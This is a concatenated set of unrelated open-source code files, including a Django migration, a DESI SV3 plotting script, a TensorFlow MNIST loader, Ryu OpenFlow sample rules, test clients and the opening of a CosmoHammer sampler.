# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-04-13 18:21 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('common', '0003_delete_contributors'), ] operations = [ migrations.CreateModel( name='WorkContributor', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('contribution_type', models.PositiveSmallIntegerField(choices=[(0, 'Author'), (1, 'Editor'), (2, 'Translator')])), ('order', models.PositiveSmallIntegerField(default=0)), ], ), migrations.RemoveField( model_name='contributor', name='contributor_type', ), migrations.RemoveField( model_name='contributor', name='order', ), migrations.AddField( model_name='workcontributor', name='contributor', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Contributor'), ), migrations.AddField( model_name='workcontributor', name='work', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Work'), ), migrations.AddField( model_name='work', name='contributors', field=models.ManyToManyField(through='common.WorkContributor', to='common.Contributor'), ), ]
1.234375
1
scripts/analysis/desi/plot_sv3.py
mehdirezaie/LSSutils
1
12754859
""" Plot SV3 Results """ # LRGs import sys sys.path.append('/home/mehdi/github/LSSutils') import matplotlib.pyplot as plt from matplotlib.backends.backend_pdf import PdfPages import healpy as hp import numpy as np from time import time import fitsio as ft from lssutils.lab import (make_overdensity, AnaFast, histogram_cell, hpixsum, get_meandensity) from lssutils.stats.pcc import pcc from lssutils.dataviz import setup_color import pandas as pd root_dir = '/home/mehdi/data/dr9v0.57.0/' def cutphotmask(aa, bits): print(f'{len(aa)} before imaging veto') keep = (aa['NOBS_G']>0) & (aa['NOBS_R']>0) & (aa['NOBS_Z']>0) for biti in bits: keep &= ((aa['MASKBITS'] & 2**biti)==0) print(f'{keep.sum()} after imaging veto') print(keep) return keep class SV3Data: def __init__(self, target, region, mversion): columns = ['RA', 'DEC', 'NOBS_R', 'NOBS_G', 'NOBS_Z', 'MASKBITS'] bits = [1, 5, 6, 7, 8, 9, 11, 12, 13] self.nside = 256 p = f'{root_dir}sv3_v1/' self.dcat = ft.read(f'{p}sv3target_{target}_{region}.fits', columns=columns) self.rcat = ft.read(f'{p}{region}_randoms-1-0x2.fits', columns=columns) self.wrf = ft.read(f'{p}sv3target_{target}_{region}.fits_EdWsys/wsys_v0.fits')['wsys'] self.wnn = ft.read(f'{p}sv3target_{target}_{region}.fits_MrWsys/wsys_{mversion}.fits')['wsys'] ix_d = cutphotmask(self.dcat, bits) self.dcat = self.dcat[ix_d] self.wrf = self.wrf[ix_d] self.wnn = self.wnn[ix_d] ix_r = cutphotmask(self.rcat, bits) self.rcat = self.rcat[ix_r] print(f'mean(wrf): {self.wrf.mean():.2f}, {self.wrf.min():.1f} < wrf < {self.wrf.max():.1f}') print(f'mean(wnn): {self.wnn.mean():.2f}, {self.wnn.min():.1f} < wnn < {self.wnn.max():.1f}') self.af = AnaFast() tmpl = pd.read_hdf(f'/home/mehdi/data/templates/dr9/pixweight_dark_dr9m_nside{self.nside}.h5') #self.cols = ['nstar', 'ebv', 'loghi']\ # +[f'{s}_{b}' for s in ['ccdskymag_mean', 'fwhm_mean', 'fwhm_min', 'fwhm_max', 'depth_total', # 'mjd_mean', 'mjd_min', 'mjd_max', 'airmass_mean', 'exptime_total']\ # for b in ['g', 'r', 'z']] self.cols = ['stardens', 'ebv', 'loghi', 'psfdepth_g', 'psfdepth_r', 'psfdepth_z', 'galdepth_g', 'galdepth_r', 'galdepth_z', 'psfsize_g', 'psfsize_r', 'psfsize_z', 'psfdepth_w1', 'psfdepth_w2'] self.tmpl = tmpl[self.cols].values def make_delta(self): nran = hpixsum(self.nside, self.rcat['RA'], self.rcat['DEC'])*1.0 self.mask = (nran > 0) print(f'mask: {self.mask.sum()} pixels') is_good = np.isfinite(self.tmpl).sum(axis=1) == len(self.cols) self.mask &= is_good print(f'mask: {self.mask.sum()} pixels (with imaging)') self.frac = nran / nran[self.mask].mean() self.mask &= (self.frac > 0.2) print(f'mask: {self.mask.sum()} pixels (with frac>0.2)') self.ngal_now = hpixsum(self.nside, self.dcat['RA'], self.dcat['DEC'])*1.0 self.ngal_rf = hpixsum(self.nside, self.dcat['RA'], self.dcat['DEC'], weights=self.wrf) self.ngal_wnn = hpixsum(self.nside, self.dcat['RA'], self.dcat['DEC'], weights=self.wnn) self.delta_now = make_overdensity(self.ngal_now, self.frac, self.mask) self.delta_rf = make_overdensity(self.ngal_rf, self.frac, self.mask) self.delta_wnn = make_overdensity(self.ngal_wnn, self.frac, self.mask) def make_cl(self): self.cl_now = self.af(self.delta_now, self.frac, self.mask) self.cl_rf = self.af(self.delta_rf, self.frac, self.mask) self.cl_nn = self.af(self.delta_wnn, self.frac, self.mask) def make_nbar(self): self.nbar_now = get_meandensity(self.ngal_now, self.frac, self.mask, self.tmpl) self.nbar_rf = get_meandensity(self.ngal_rf, self.frac, self.mask, self.tmpl) self.nbar_nn = get_meandensity(self.ngal_wnn, self.frac, self.mask, 
self.tmpl) def make_pcc(self): self.pcc_now = pcc(self.tmpl[self.mask], self.delta_now[self.mask], return_err=True) self.pcc_rf = pcc(self.tmpl[self.mask], self.delta_rf[self.mask]) self.pcc_nn = pcc(self.tmpl[self.mask], self.delta_wnn[self.mask]) setup_color() region = sys.argv[1] # NDECALS target = sys.argv[2] # QSO mversion = sys.argv[3] assert region in ['NDECALS', 'SDECALS', 'NBMZLS', 'DES', 'SDECALS_noDES', 'DES_noLMC'] assert target in ['QSO', 'LRG', 'ELG', 'BGS_ANY'] print(f'target: {target}, region: {region}, mversion: {mversion}') target_region = f'{target}-{region}-{mversion}' t0 = time() sv = SV3Data(target, region, mversion) t1 = time() print(f'Finished reading in {t1-t0:.1f} sec') sv.make_delta() t2 = time() print(f'Finished deltas in {t2-t1:.1f} sec') sv.make_cl() t3 = time() print(f'Finished Cell in {t3-t2:.1f} sec') sv.make_nbar() t4 = time() print(f'Finished nbar in {t4-t3:.1f} sec') sv.make_pcc() t5 = time() print(f'Finished pcc in {t5-t4:.1f} sec') pp = PdfPages(''.join([f'{root_dir}sv3_v1/', target_region, '.pdf'])) # C_ell methods = ['No weight', 'RF weight', 'NN weight'] cls = [sv.cl_now, sv.cl_rf, sv.cl_nn] fg, ax = plt.subplots(figsize=(8, 6)) for n_i, cl_i in zip(methods, cls ): lb, clb = histogram_cell(cl_i['cl'], bins=np.logspace(0, np.log10(770), 10)) l_, = ax.plot(cl_i['cl'], lw=1, zorder=-1, alpha=0.2) ax.plot(lb, clb, marker='.', mfc='w', ls='None', color=l_.get_color(), label=n_i) ax.legend(title=target_region, frameon=False) ax.set(xscale='log', yscale='log', ylim=(2.0e-8, 8.0e-3), xlabel=r'$\ell$', ylabel=r'C$_{\ell}$') #fg.savefig('cl_lrg_bmzls.png', dpi=300, bbox_inches='tight') pp.savefig(bbox_inches='tight') # Nbar fig, ax = plt.subplots(ncols=3, nrows=5, figsize=(22, 25), sharey=True) fig.subplots_adjust(hspace=0.35, wspace=0.1) ax = ax.flatten() nbars = [sv.nbar_now, sv.nbar_rf, sv.nbar_nn] for name_i, nbar_i in zip(methods, nbars): for j, nbar_ij in enumerate(nbar_i): ax[j].plot(nbar_ij['bin_avg'], nbar_ij['nnbar'], marker='.', mfc='w', label=name_i) if name_i == 'No weight': ax[j].fill_between(nbar_ij['bin_avg'], 1-nbar_ij['nnbar_err'], 1+nbar_ij['nnbar_err'], color='grey', alpha=0.2, zorder=-1) ax[2].legend(title=target_region, frameon=False) for j, colj in enumerate(sv.cols): ax[j].set_xlabel(colj) if j%3==0: ax[j].set_ylabel('Mean Density') pp.savefig(bbox_inches='tight') # PCC fg, ax = plt.subplots(figsize=(12, 4)) x_columns = np.arange(len(sv.cols)) ax.set_xticks(x_columns) ax.set_xticklabels(sv.cols, rotation=90) pcc_min, pcc_max = np.percentile(sv.pcc_now[1], [2.5, 97.5], axis=0) ax.bar(x_columns-0.25, sv.pcc_now[0], width=0.25, label='No weight') ax.bar(x_columns, sv.pcc_rf[0], width=0.25, label='RF') ax.bar(x_columns+0.25, sv.pcc_nn[0], width=0.25, label='NN') ax.fill_between(x_columns, pcc_min, pcc_max, color='grey', alpha=0.2, zorder=10) ax.legend(title=target_region, frameon=False) ax.grid(ls=':') ax.set(ylabel='PCC') pp.savefig(bbox_inches='tight') pp.close()
1.898438
2
research/domain_adaptation/datasets/mixed.py
runchida/models
0
12754987
<filename>research/domain_adaptation/datasets/mixed.py from __future__ import absolute_import from __future__ import division from __future__ import print_function import os # Dependency imports import tensorflow as tf import numpy as np from research.slim.datasets import dataset_utils slim = tf.contrib.slim _FILE_PATTERN_ONE_CLASS = {'mnist': 'mnist_%s_%s.tfrecord', 'mnist_m': 'mnist_m_%s_%s.tfrecord'} _SPLITS_TO_SIZES = {'train': 58001, 'valid': 1000, 'test': 9001} _NUM_CLASSES = 10 _ITEMS_TO_DESCRIPTIONS = { 'image': 'A [28 x 28 x 1] grayscale image.', 'label': 'A single integer between 0 and 9', } _ITEMS_TO_DESCRIPTIONS_MNIST_M = { 'image': 'A [32 x 32 x 1] RGB image.', 'label': 'A single integer between 0 and 9', } def get_split(split_name, dataset_dir, labels_one, labels_two, file_pattern=None): # get tf.data.Dataset # tf.enable_eager_execution() if split_name not in _SPLITS_TO_SIZES: raise ValueError('split name %s was not recognized.' % split_name) file_list_mnist, file_list_mnist_m = get_file_list(dataset_dir, file_pattern, split_name, labels_one, labels_two) dataset_mnist = tf.data.TFRecordDataset(file_list_mnist) dataset_mnist_m = tf.data.TFRecordDataset(file_list_mnist_m) dataset_mnist = dataset_mnist.map(decode_gray) dataset_mnist_m = dataset_mnist_m.map(decode_rgb) # tf.data.Dataset return dataset_mnist, dataset_mnist_m # def get_split(split_name, dataset_dir, labels_one, labels_two, file_pattern=None, reader=None): # """Gets a dataset tuple with instructions for reading MNIST. # # Args: # split_name: A train/test split name. # dataset_dir: The base directory of the dataset sources. # file_pattern: The file pattern to use when matching the dataset sources. # It is assumed that the pattern contains a '%s' string so that the split # name can be inserted. # reader: The TensorFlow reader type. # # Returns: # A `Dataset` namedtuple. # # Raises: # ValueError: if `split_name` is not a valid train/test split. # """ # if split_name not in _SPLITS_TO_SIZES: # raise ValueError('split name %s was not recognized.' % split_name) # # if not file_pattern: # file_list = get_file_list(dataset_dir, file_pattern, split_name, labels_one, labels_two) # # # Allowing None in the signature so that dataset_factory can use the default. # if reader is None: # reader = tf.TFRecordReader # # keys_to_features = { # 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), # 'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'), # 'image/class/label': tf.FixedLenFeature( # [1], tf.int64, default_value=tf.zeros([1], dtype=tf.int64)), # } # # items_to_handlers = { # 'image': slim.tfexample_decoder.Image(shape=[28, 28, 1], channels=1), # 'label': slim.tfexample_decoder.Tensor('image/class/label', shape=[]), # } # # decoder = slim.tfexample_decoder.TFExampleDecoder( # keys_to_features, items_to_handlers) # # labels_to_names = None # if dataset_utils.has_labels(dataset_dir): # labels_to_names = dataset_utils.read_label_file(dataset_dir) # # return slim.dataset.Dataset( # data_sources=file_list, # reader=reader, # decoder=decoder, # num_samples=_SPLITS_TO_SIZES[split_name], # num_classes=_NUM_CLASSES, # items_to_descriptions=_ITEMS_TO_DESCRIPTIONS, # labels_to_names=labels_to_names) def decode_gray(serialized_example): """ Parses an image and label from the given `serialized_example`. 
It is used as a map function for `dataset.map` """ keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'), 'image/class/label': tf.FixedLenFeature( [1], tf.int64, default_value=tf.zeros([1], dtype=tf.int64)), } # 1. define a parser parsed_dataset = tf.io.parse_single_example( serialized_example, # Defaults are not specified since both keys are required. features=keys_to_features) # # # 2. Convert the data image = tf.io.decode_png(parsed_dataset['image/encoded'], channels=0, dtype=tf.uint8) label = tf.cast(parsed_dataset['image/class/label'], tf.uint8) image = tf.image.convert_image_dtype(image, tf.float32) image = tf.image.grayscale_to_rgb(image) image = tf.image.resize_images(image, [32, 32]) label = tf.reshape(label, shape=[]) return image, label def decode_rgb(serialized_example): """ Parses an image and label from the given `serialized_example`. It is used as a map function for `dataset.map` """ keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'), 'image/class/label': tf.FixedLenFeature( [1], tf.int64, default_value=tf.zeros([1], dtype=tf.int64)), } # 1. define a parser parsed_dataset = tf.io.parse_single_example( serialized_example, # Defaults are not specified since both keys are required. features=keys_to_features) # # # 2. Convert the data image = tf.io.decode_png(parsed_dataset['image/encoded'], channels=0, dtype=tf.uint8) label = tf.cast(parsed_dataset['image/class/label'], tf.uint8) image = tf.image.convert_image_dtype(image, tf.float32) image = tf.image.resize_images(image, [32, 32]) image = tf.reshape(image, [32, 32, 3]) label = tf.reshape(label, shape=[]) return image, label def get_class_labels(num_classes): # get lists of labels for source and target domains # labels one if num_classes < 5: raise ValueError('Number of classes must be between 5 to 10') class_labels_source_one = [] fill_list(class_labels_source_one, num_classes) # labels two class_labels_source_two = [] class_labels_test_one = [] for x in range(0, 10): append = not (has_number(class_labels_source_one, x)) if append: class_labels_source_two.append(x) class_labels_test_one.append(x) fill_list(class_labels_source_two, num_classes) class_labels_test_two = [] for x in range(0, 10): append = not (has_number(class_labels_source_two, x)) if append: class_labels_test_two.append(x) labels = { 'labels1': class_labels_source_one, 'labels2': class_labels_source_two, 'labels3': class_labels_test_one, 'labels4': class_labels_test_two } return labels def fill_list(list, num_classes): # fill a list with numbers until it has 'num_classes' members while len(list) < num_classes: randnum = np.random.randint(0, 10) append = not (has_number(list, randnum)) if append: list.append(randnum) return list def has_number(list, num): # check if a list contains number num check = False for member in list: if member == num: check = True return check def get_file_list(dataset_dir, file_pattern, split_name, labels_mnist, labels_mnist_m): # create list of files lead to mnist with labels_one and mnist-m with labels_two # lists of paths to separated tfrecord for mixed-domain case file_list_mnist = [] file_list_mnist_m = [] if not file_pattern: for class_label in labels_mnist: file_pattern = _FILE_PATTERN_ONE_CLASS['mnist'] file_pattern = os.path.join(dataset_dir, 'mix', file_pattern % (split_name, str(class_label))) 
file_list_mnist.append(file_pattern) for class_label in labels_mnist_m: file_pattern = _FILE_PATTERN_ONE_CLASS['mnist_m'] file_pattern = os.path.join(dataset_dir, 'mix', file_pattern % (split_name, str(class_label))) file_list_mnist_m.append(file_pattern) return file_list_mnist, file_list_mnist_m else: return file_pattern def get_train_log_dir(training_name): experiment_dir = os.path.join('/home', 'runchi', 'thesis', 'graphs', 'experiment') # experiment_dir = os.path.join('/home', 'rk64vona', 'thesis', 'graphs', 'experiment') train_log_dir = os.path.join(experiment_dir, '%s/' % training_name) if not tf.gfile.Exists(train_log_dir): tf.gfile.MkDir(train_log_dir) retrain = False else: retrain = True return train_log_dir, retrain def write_label(train_log_dir, labels): dataset_utils.write_mixed_labels(train_log_dir, labels) def read_mixed_labels(train_log_dir): return dataset_utils.read_mixed_labels(train_log_dir)
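
# Hedged usage sketch (added for illustration; the dataset path and eager-mode
# iteration are assumptions, not taken from the original module):
# labels = get_class_labels(7)
# ds_mnist, ds_mnist_m = get_split('train', '/data/mixed_domains',
#                                  labels['labels1'], labels['labels2'])
# for image, label in ds_mnist.take(1):
#     print(image.shape, label)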
1.546875
2
fixture/application.py
natalianik/python_training
0
12755115
<gh_stars>0
import pytest
import _pytest
from selenium.webdriver.firefox.webdriver import WebDriver
from fixture.session import SessionHelper
from fixture.group import GroupHelper
from fixture.contact import ContactHelper

# __author__ = 'Natalia.Nikonova'


class Application:

    def __init__(self):
        self.wd = WebDriver()
        self.session = SessionHelper(self)
        self.group = GroupHelper(self)
        self.contact = ContactHelper(self)

    def is_valid(self):
        try:
            self.wd.current_url
            return True
        except Exception:
            return False

    def open_home_page(self):
        wd = self.wd
        wd.get("http://localhost/addressbook/")

    def destroy(self):
        self.wd.quit()
1.585938
2
Ene-Jun-2022/saul-alejandro-cavazos-nelson/practica_1_comandos_de_python.py
KevinBR117/DAS_Sistemas
1
12755243
# this is a comment in Python

# declare a variable
x = 5

# print the variable
print("x =", x)

# arithmetic operations
print("x - 5 = ", x - 5)
print("x + 5 = ", x + 5)
print("x * 5 = ", x * 5)
print("x % 5 = ", x % 5)
print("x / 5 = ", x / 5)
print("x // 5 = ", x // 5)
print("x ** 5 = ", x ** 5)
2.359375
2
tests/rulesets/sample_rules.py
wandsdn/ofsolver
1
12755371
<reponame>wandsdn/ofsolver from ryu.ofproto import ofproto_v1_3 from ryu.ofproto import ofproto_v1_3_parser as parser import pickle """ Make the rules for a simple L2 L3 pipeline ETH_DST 1&2 +--------------+ | | | 2 Routing | | | | IP_DST -> | +-------------+ +--------------+ +---> OUTPUT | | | | | | | SET MAC | | 0 TCP ACL | | 1 MAC TERM | | | | | (TCP_DST) | | ETH_DST -> | | | | | DROP | | goto : 2 | | +--------------+ | +-------> +-+ | else | | else | | | | goto: 3 | | goto: 1 | | +-+ +-------------+ +--------------+ | ETH_DST 10&11&12 | +---------------+ | | | | | 3 L2 FWD | | | | +--^+ ETH_DST -> | | OUTPUT | | | | | | | | | +---------------+ """ flows = [ # Table 0 parser.OFPFlowStats( table_id=0, priority=1000, match=parser.OFPMatch(tcp_dst=80), instructions=[] ), parser.OFPFlowStats( table_id=0, priority=1000, match=parser.OFPMatch(tcp_dst=443), instructions=[] ), parser.OFPFlowStats( table_id=0, priority=0, match=parser.OFPMatch(), instructions=[parser.OFPInstructionGotoTable(1)] ), # Table 1 parser.OFPFlowStats( table_id=1, priority=1000, match=parser.OFPMatch(eth_dst=1), instructions=[parser.OFPInstructionGotoTable(2)] ), parser.OFPFlowStats( table_id=1, priority=1000, match=parser.OFPMatch(eth_dst=2), instructions=[parser.OFPInstructionGotoTable(2)] ), parser.OFPFlowStats( table_id=1, priority=0, match=parser.OFPMatch(), instructions=[parser.OFPInstructionGotoTable(3)] ), # Table 2 parser.OFPFlowStats( table_id=2, priority=1008, match=parser.OFPMatch(ipv4_dst=("1.0.0.0", "255.0.0.0")), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionSetField(eth_src=100), parser.OFPActionSetField(eth_dst=20), parser.OFPActionOutput(20) ] ) ] ), parser.OFPFlowStats( table_id=2, priority=1008, match=parser.OFPMatch(ipv4_dst=("10.0.0.0", "255.0.0.0")), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionSetField(eth_src=100), parser.OFPActionSetField(eth_dst=20), parser.OFPActionOutput(20) ] ) ] ), parser.OFPFlowStats( table_id=2, priority=1000, match=parser.OFPMatch(ipv4_dst=("0.0.0.0", "0.0.0.0")), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionSetField(eth_src=101), parser.OFPActionSetField(eth_dst=21), parser.OFPActionOutput(21) ] ) ] ), # Table 3 parser.OFPFlowStats( table_id=3, priority=1000, match=parser.OFPMatch(eth_dst=10), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionOutput(10) ] ) ] ), parser.OFPFlowStats( table_id=3, priority=1000, match=parser.OFPMatch(eth_dst=11), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionOutput(11) ] ) ] ), parser.OFPFlowStats( table_id=3, priority=1000, match=parser.OFPMatch(eth_dst=12), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionOutput(12) ] ) ] ), ] with open('sample_rules.pickle', 'wb') as f: pickle.dump(flows, f)
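
# Hedged round-trip check (added for illustration): reading the file back requires
# ryu to be importable, because unpickling reconstructs the OFPFlowStats objects.
with open('sample_rules.pickle', 'rb') as f:
    loaded_flows = pickle.load(f)
assert len(loaded_flows) == len(flows)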
1.367188
1
pyleecan/Methods/Slot/HoleM53/get_height_magnet.py
helene-t/pyleecan
1
12755499
# -*- coding: utf-8 -*- def get_height_magnet(self): """get the height of the hole magnets Parameters ---------- self : HoleM53 A HoleM53 object Returns ------- Hmag: float height of the 2 Magnets [m] """ # magnet_0 and magnet_1 have the same height Hmag = self.H2 return Hmag
2.078125
2
server/test_client.py
adp162/alexa-vera-bridge
13
12755627
<reponame>adp162/alexa-vera-bridge #!/usr/bin/python import sys import os from shutil import copyfile import argparse import time import threading # Actually use the client code to test sending server message # Note that you must have ../lambda in your PYTHONPATH variable for this # to work (e.g. export PYTHONPATH=../lambda) import client # Thread to send a bunch of messages to the server def client_thread(i): print 'starting thread ' + str(i) data = [ { 'id':1, 'action': {'type': 'get' } }, { 'id':2, 'action': {'type': 'set', 'attribute': {'power': 0} } }, { 'id':3, 'action': {'type': 'run' } }, { 'id':4, 'action': {'type': 'get' } }, { 'id':5, 'action': {'type': 'set', 'attribute': {'power': 1} } }, { 'id':6, 'action': {'type': 'run' } } ] # Send the messages a bunch of times for j in range(100): send_data(data) print 'thread ' + str(i) + ' finished' # Pass in a list of data (or single element) def send_data(data): # Try connecting to the Vera server (socket, msg) = client.open_connection_to_vera() if socket == None: print 'Error connecting to AVBServer: ' + msg sys.exit() # Send the test messages and check response if type(data) is list: for d in data: resp = client.send_vera_message(socket, d) assert d == resp['data'] else: resp = client.send_vera_message(socket, data) assert data == resp['data'] # Close the connection client.close_connection_to_vera(socket) def main(): # NOTE: These tests should run with the server option "--no-vera" specified # since they are designed to check the response matches the data sent. # To send a real command to Vera, use the command line argument described # below. parser = argparse.ArgumentParser() parser.add_argument('-a', '--action', help='action type', type=str, choices=['get', 'set', 'run']) parser.add_argument('-d', '--device', help='device id', type=int) parser.add_argument('-c', '--command', help='the command to send', type=str, choices=['on', 'off']) args = parser.parse_args() # Change to lambda directory because all the client.py functions assume the # files they need (certs, config, etc.) are in the same directory print 'in ' + os.getcwd() os.chdir('../lambda') print 'changed to ' + os.getcwd() # Temporarily copy sample security assets to lambda directory copyfile('../security/sample/rootCA.pem', './rootCA.pem') copyfile('../security/sample/client.crt', './client.crt') copyfile('../security/sample/client.key', './client.key') copyfile('../security/sample/psk.bin', './psk.bin') # Did we specify any of the optional arguments? 
if args.action or args.device or args.command: # Do some sanity checks if args.action is None or args.device is None: parser.error('You must specify device, and action') if args.action == 'set' and args.command is None: parser.error('You must specify a command with set action') # Setup the data, run the request, then exit attr = None if args.command == 'on': attr = {'power': 1} elif args.command == 'off': attr = {'power': 0} data = { 'id':args.device, 'action': {'type': args.action, 'attribute': attr } } run_test(0, data) else: # TEST: Run scene 1 print 'Running test #1' data = { 'id':1, 'action': {'type': 'run' } } send_data(data) print # TEST: Run scene 2 print 'Running test #2' data = { 'id':2, 'action': {'type': 'run' } } send_data(data) print # TEST: Turn device 1 on and get status print 'Running test #3' data = [ { 'id':1, 'action': {'type': 'set', 'attribute': {'power': 1} } }, { 'id':1, 'action': {'type': 'get' } } ] send_data(data) print # TEST: Get status, turn device 1 off, get status again print 'Running test #4' data = [ { 'id':1, 'action': {'type': 'get' } }, { 'id':1, 'action': {'type': 'set', 'attribute': {'power': 0} } }, { 'id':1, 'action': {'type': 'get' } } ] send_data(data) print # TEST: leave socket open (eventually server should kill) print 'Running test #5' (socket, msg) = client.open_connection_to_vera() print 'sleeping for 10s...' # Server will close() the socket time.sleep(10) try: resp = client.send_vera_message(socket, { 'id':1, 'action': {'type': 'get' } } ) except RuntimeError as e: print 'Failed correctly with: ' + str(e) print # TEST: poorly formatted message (should catch AVBMessage exception) print 'Running test #6' (socket, msg) = client.open_connection_to_vera() try: resp = client.send_vera_message(socket, 'bad message') except ValueError as e: print 'Failed correctly with: ' + str(e) print # TEST: message too long (should catch AVBMessage exception) print 'Running test #7' (socket, msg) = client.open_connection_to_vera() try: # Send a super long tag to ensure resulting JSON string is too long resp = client.send_vera_message(socket, { 't'*9999:1 } ) except ValueError as e: print 'Failed correctly with: ' + str(e) print # TEST: bombard server with simultaneous requests print 'Running test #8' threads = [] for i in range(10): t = threading.Thread(target=client_thread, args=(i,)) t.start() threads.append(t) for t in threads: t.join() print # Remove the security assets copied earlier os.remove('rootCA.pem') os.remove('client.crt') os.remove('client.key') os.remove('psk.bin') if __name__ == '__main__': main()
2.078125
2
app/models/phone.py
olivierpons/evalr
0
12755755
<filename>app/models/phone.py from django.db import models from app.models.base import BaseModel class Phone(BaseModel): phone = models.CharField(max_length=30, blank=True, null=True)
0.914063
1
fiepipelib/fiepipeserver/client.py
leith-bartrich/fiepipe
0
12755883
import os

import rpyc
import rpyc.utils
import rpyc.utils.zerodeploy
import plumbum.machines.paramiko_machine
import fiepipelib.localuser.routines.localuser


class client(object):
    """Local client for the fiepipeserver server"""

    _localUser = None
    _hostname = None
    _username = None
    _policy = None

    def __init__(self, hostname, username, localUser, autoAddHosts=False):
        """@param autoAddHosts: If true, automatically adds hosts to the list of trusted hosts if it hasn't seen them before.  If false, it rejects them.
        """
        assert isinstance(localUser, fiepipelib.localuser.routines.localuser.LocalUserRoutines)
        self._localUser = localUser
        self._hostname = hostname
        self._username = username
        self._connections = []
        if autoAddHosts:
            self._policy = plumbum.machines.paramiko_machine.paramiko.AutoAddPolicy
        else:
            self._policy = plumbum.machines.paramiko_machine.paramiko.RejectPolicy

    _machine = None
    _server = None
    _connections = None

    def GetHostsFilePath(self):
        return os.path.join(self._localUser.get_pipe_configuration_dir(), "fiepipeclient_known_hosts.txt")

    def RemoveKnownHost(self):
        hosts = plumbum.machines.paramiko_machine.paramiko.HostKeys(self.GetHostsFilePath())
        if hosts.lookup(self._hostname) != None:
            hosts.pop(self._hostname)
        hosts.save(self.GetHostsFilePath())

    def getConnection(self):
        """Warning: the missing host policy is auto-add.  The first time you connect to this thing,
        make sure you actually trust your DNS and network.  Subsequent reconnections should be secure.
        """
        if len(self._connections) != 0:
            return self._connections.pop()
        else:
            if self._machine == None:
                self._machine = plumbum.machines.paramiko_machine.ParamikoMachine(host=self._hostname, user=self._username, missing_host_policy=self._policy, keyfile=self.GetHostsFilePath())
            if self._server == None:
                self._server = rpyc.utils.zerodeploy.DeployedServer(remote_machine=self._machine, server_class='fiepipelib.fiepipeserver.server.server')
            connection = self._server.connect()
            return connection

    def returnConnection(self, connection):
        if not connection.closed:
            self._connections.append(connection)

    def close(self):
        if self._server != None:
            self._server.close()
        for c in self._connections:
            c.close()
        self._connections.clear()

    def get_all_registered_sites(self, connection, fqdn):
        """Usually, this data is harmless if spoofed.  Annoying for sure, but harmless.
        All warnings about signatures should be heeded when one uses this info to connect to a site later however.
        """
        return connection.get_all_registered_sites(fqdn)

    def get_all_regestered_legal_entities(self, connection):
        """This can be a good legal entity distribution mechanism as long as the user knows how to verify a secure
        connection the first time they pull.  See getConnection for the technical explanation.
        Ultimately, the question is: do you trust the server you logged into originally?
        """
        return connection.get_all_regestered_legal_entities()

    def get_all_registered_containers(self, connection):
        """This can be a good container distribution mechanism as long as the user knows how to verify a secure
        connection the first time they pull.  See getConnection for the technical explanation.
        Ultimately, the question is: do you trust the server you logged into originally?
        Consider using a site state server method instead, as you can validate that the legal entity trusts
        the state server even if you've never seen it before.
        """
        return connection.get_all_registered_containers()

    def get_registered_containers_by_fqdn(self, connection, fqdn):
        """See get_all_registered_containers
        @param fqdn: the fqdn to restrict the search to.
""" return connection.get_registered_containers_by_fqdn(fqdn) def set_registered_containers(self, connection, containers): """Sets the given cainters to the registry on the server. Used to push containers.""" return connection.set_registered_containers(containers) def ping(self, connection): return connection.ping()
1.523438
2
tests/query/bugs/fixed_bigint_2031.py
liuqian1990/nebula
8,586
12756011
# --coding:utf-8-- # # Copyright (c) 2020 vesoft inc. All rights reserved. # # This source code is licensed under Apache 2.0 License. import time from tests.common.nebula_test_suite import NebulaTestSuite class TestBigInt(NebulaTestSuite): @classmethod def prepare(self): resp = self.execute( 'CREATE SPACE IF NOT EXISTS BigInt2031(partition_num={partition_num}, replica_factor={replica_factor})' .format(partition_num=self.partition_num, replica_factor=self.replica_factor)) self.check_resp_succeeded(resp) time.sleep(self.delay) resp = self.execute('USE BigInt2031') self.check_resp_succeeded(resp) def test_issue2031(self): time.sleep(self.delay) resp = self.execute( 'CREATE TAG person1(name string, age bigint)') self.check_resp_failed(resp) resp = self.execute( 'CREATE TAG person2(name string, age bigint DEFAULT 100)') self.check_resp_failed(resp) resp = self.execute( 'CREATE TAG person3(name string, age Bigint)') self.check_resp_failed(resp) resp = self.execute( 'CREATE TAG person4(name string, age BIGINT)') self.check_resp_failed(resp) @classmethod def cleanup(self): resp = self.execute('drop space BigInt2031') self.check_resp_succeeded(resp)
1.273438
1
public_21CMvFAST_MC/Programs/CosmoHammer_21CMMC/sampler/CosmoHammerSampler.py
NNSSA/21cmvFAST
5
12756139
<filename>public_21CMvFAST_MC/Programs/CosmoHammer_21CMMC/sampler/CosmoHammerSampler.py #!/usr/bin/env python import CosmoHammer_21CMMC import CosmoHammer_21CMMC.constants.Constants as c from CosmoHammer_21CMMC.util.SampleFileUtil import SampleFileUtil from CosmoHammer_21CMMC.sampler.util.IterationStopCriteriaStrategy import IterationStopCriteriaStrategy from CosmoHammer_21CMMC.sampler.util.VariousInitialConditionGenerators import UniformPosition from CosmoHammer_21CMMC import emcee import numpy as np import logging import time class CosmoHammerSampler(object): """ A complete sampler implementation taking care of correct setup, chain burn in and sampling. :param params: the parameter of the priors :param likelihoodComputationChain: the callable computation chain :param filePrefix: the prefix for the log and output files :param walkerRatio: the ratio of walkers and the count of sampled parameters :param burninIterations: number of iteration for burn in :param sampleIterations: number of iteration to sample :param stopCriteriaStrategy: the strategy to stop the sampling. Default is None an then 